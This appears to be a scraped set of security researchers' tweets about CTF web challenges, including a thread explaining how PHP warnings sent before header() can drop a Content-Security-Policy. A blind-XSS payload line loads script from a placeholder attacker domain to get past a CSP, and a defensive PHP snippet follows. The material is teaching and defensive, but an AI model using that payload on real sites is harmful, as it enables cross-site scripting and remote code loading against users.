🧵[1/9] Time to publish the solution to this challenge! The goal of this challenge was to find an XSS while avoiding it being blocked by the CSP sent by the PHP header() function. Let's dive into it!
This Friday, I'm presenting a novel technique as part of my talk "Secret web hacking knowledge - CTF authors hate these simple tricks".
I've made a challenge about it, will you be able to pop an alert on ? The whole source code is in the screens below :)
1) This is not a wordpress vulnerability, but a plugin's one
2) This is not a 0day, it's already been reported and fixed since September
3) If it was, you would be disclosing it irresponsibly
Yet, you received tons of likes and RT by straight up lying 🤡
Yay, I was awarded a $2000 bounty on
@Hacker0x01
!
#TogetherWeHitHarder
Big thanks to all the absurd XSS black magic fuckeries I've seen in various CTFs, they really helped me get my exploit to work :D
Imagine creating a web chall using the sanitizer API, then Chrome just fucking removes it with its new release 3 days before the CTF starts 💀
Anyway, come play LakeCTF, it's this weekend and I've prepared 2 challenges for it :) (and go follow
@polygl0ts
!)
Haven't had this in the wild yet so don't know how useful of a tip this is, but adding a generic CSP bypass for your bxss payloads might be a good idea
x=("/%00"); setTimeout(()=>x.document.write("<img src=x onerror='import(\"//YourBXSSDomain\")'>"),999)
@terjanq
🧵[6/9] This means that if we have, for example, a request containing more than 1000 GET parameters, a warning will be sent, and the CSP header won't! Trying this solution () on remote, we can pop an alert!
I find pentesting Active Directory to be hard because of all of the tools, commands, and techniques you have to keep in mind, but
@orangecyberdef
's mindmap is very nice and it helped me a ton of times!
I can only recommend putting it in your bookmarks :)
Last year I cried over a
@PlaidCTF
web challenge all night while being super sleep-deprived... But this year, well exactly the same thing happened, but at least it's solved now 🫠
We've just launched a new topic on bypassing SameSite cookie restrictions! Learn how to evade browsers' cookie defences and perform successful cross-site attacks with our interactive labs:
After 7 years of service, I have to say goodbye to my old laptop and all of its stickers. Will definitely miss some of them.
Now is the time for me to start again on a fresh new one, good thing I had some left! :)
Awesome writeup by
@xanhacks
for my LakeCTF challenge GeoGuessy, including the two unintended as well as the intended solution!
Go check it out, it's very nice :)
Write-up of the last Web challenge of
@LakeCtf
2023, which I was unable to solve during the competition.
🚩 Race conditions, XSS, and bypasses of client-side security to extract the GPS coordinates of the bot
🏆 Reliving the highlights of the Cybersecurity Rumble 2023!
Again, congratulations to our winners:
🥇 p0lyflag
🥈 __watermelon_chk_fail
🥉
@C_S_C_G
A big shoutout to all teams, volunteers and our amazing partners, you made this event unforgettable!
Until next year! 🚀
@terjanq
🧵[5/9] At this point, it is necessary to dive into PHP internals and look for a way to create warnings before the PHP page code is executed. Looking at the HTTP parameter processing, we can find multiple cases where warnings are created; here are three examples:
Not a first blood, but hey at least I get the $100 swag card :p
Thanks for these cool challs
@hackthebox_eu
! Am enjoying them a lot :)
#OperationTinselTrace
@intigriti
Easy, unsubscribeUser is not defined. The dev forgot to include the necessary js code for this feature to work, making the company vulnerable to GDPR fines 😎
Day 33/33! That's a wrap for this semester! I'm really happy that I've been able to actually do it.
I've never had to put aside my hobbies for school, so doing it for uni wasn't easy, so I'm really proud of myself for achieving this :)
Now it's time to get back to fun things! :D
After around 20 days I've successfully completed the writeup for the last web chall of
@LakeCtf
finals. Even though I was not able to solve it, I've learned so much.
I would like to thank
@pilvar222
very much for dealing with me during the whole process.
And that's a wrap for LakeCTF Quals 2023!
Congratulations to our 9 qualified teams!
🥇
@dicegangctf
🥈 ISITDTU
🥉
@fibonhack
See you all in Lausanne for the finals! 😄
PS: The 10th spot for the finals can still be won as the first prize of
@1ns0mn1h4ck
's CTF academic bracket!
🧵[3/9] This issue can be abused by forcing a page to send content before the header() function, thus preventing the presence of a potentially important security header. This has already been used in CTF challenges, notably in baby-csp by
@terjanq
@zeyu2001
The story repeats lol
Have the same feelings sometimes. Especially rwctf-style challs where you need to find a 0day in a repo. It just feels like work, it's not very enjoyable and it's tiring.
@terjanq
🧵[7/9] This solution is only one among many. From the different solutions I've seen, some also used the maximum length of the parameters or files, and I wouldn't be surprised if there are many other still-unexplored ways to create warnings! In any case, big props to the solvers!
LakeCTF has officially started and will run for 24 hours! Come and check out our challenges and try to qualify for the finals in Lausanne!
@ICepfl
#EPFLIC20
Excited to launch my first browser extension, DOMLogger++! Now available for both Firefox and Chromium! 🎉
DOMLogger++ allows you to monitor, intercept, and debug JavaScript sinks based on customizable configurations 🔥
Check it out 👇
1/5
Just discovered this version of DOM clobbering while reading
@Strellic_
's very cool write-up of his own challenge "AnalyticalEngine" . Can't wait to see the new challenges he made for corCTF 2022! 😁
Additional notes:
- here's my solution md5 hash (will release this weekend): f3512c46daf0431d3567c2f21ef82f60
- if you solved it, please DM me and don't comment your solution :)
- the intended is not a 0day, please don't submit me yours 😅
- solvers get credits + a drink from me!
@OctagonNetworks
The function is only used to prepend backslashes to certain characters such as quotes. However, here, you don't need these to continue the query, you can simply use spaces, subqueries, etc...
I love programs like these!
Compensating for the effort put into a duplicate is probably the best way a program can show its consideration for its hackers ❤️
(Also helps us keep our sanity 😅)
#BugBounty
If you (or someone you know) want to do a Security internship at
@google
Zurich, the application form is now up:
Interns at Google Security work on really cool stuff, so I highly recommend it. Hit me up if you have any questions.
#intern
#security
@garlic0ne
It's the default port for Burp Suite's proxy, so either the chall or the proxy fails to run until you change and restart it, which is quite annoying 😅
🧵[2/9] Depending on the configuration, PHP is not able to modify the headers of a response once a certain number of characters have been written to the body. This is the buffering setting, which is usually set to 4096 characters or, in the case of the php:apache image, simply disabled.
The idea behind this is not to bypass JS-execution-related CSP but rather the policies that prevent connections to external domains. Usually servers and proxies won't like the %00 in the URL and error out before even adding the CSP header. You can execute your payload in this window.
@terjanq
🧵[4/9] However, this technique has certain limitations. It requires either sending data before header() via functions such as echo, or having warnings created by the code before header() while display_errors is enabled. This challenge requires us to surpass these limitations.
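The defensive counterpart to what tweets [2/9] through [6/9] describe, as an added example that is neither the challenge's nor the author's code: header() only raises a warning and carries on when output has already started, so a page that wants a CSP should fail closed instead. The CSP value, the nonce scheme and the ini/Apache lines are assumptions chosen for illustration.

```php
<?php
// Added example, not the challenge's code: apply a CSP in a fail-closed way
// so that an early warning cannot silently strip the header.
//
// These settings must live OUTSIDE the script (php.ini, php-fpm pool,
// .user.ini or an Apache php_flag line): a warning such as the one emitted
// when max_input_vars is exceeded happens during request startup, before
// any ini_set() in the page could run.
//
//   display_errors   = Off    ; warnings go to the log, never into the body
//   log_errors       = On
//   output_buffering = 4096   ; the php:apache image ships with it disabled
//
// Second line of defence, set by the web server rather than by PHP
// (Apache mod_headers), so it survives even if header() fails:
//   Header always set Content-Security-Policy "default-src 'none'"
declare(strict_types=1);

// Assumed policy; a real one is tailored to the application.
const CSP_TEMPLATE = "default-src 'none'; script-src 'nonce-%s'; base-uri 'none'";

// Sends the CSP header, or aborts the response if PHP can no longer set
// headers. Unlike a bare header() call, this never serves the page without
// its policy.
function send_csp_or_abort(string $nonce): void
{
    if (headers_sent($file, $line)) {
        // Output (possibly a rendered warning) already reached the client,
        // so the headers are committed and the policy cannot be added.
        error_log("CSP not applied: output already started at $file:$line");
        exit;
    }
    header(sprintf('Content-Security-Policy: ' . CSP_TEMPLATE, $nonce));
}

$nonce = base64_encode(random_bytes(16));
send_csp_or_abort($nonce);

// Only after the header is committed is it safe to write the body.
echo '<!doctype html><script nonce="' . htmlspecialchars($nonce, ENT_QUOTES) . '">'
   . 'console.log("policy applied")</script>';
```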
@albinowax
If you're still looking for some ideas, I recently learned about TLS poisoning, and I think it could have more potential by digging further! :)
@joshmdx
, the researcher that discovered this, had some suggestions here: (timecode). Good luck! :D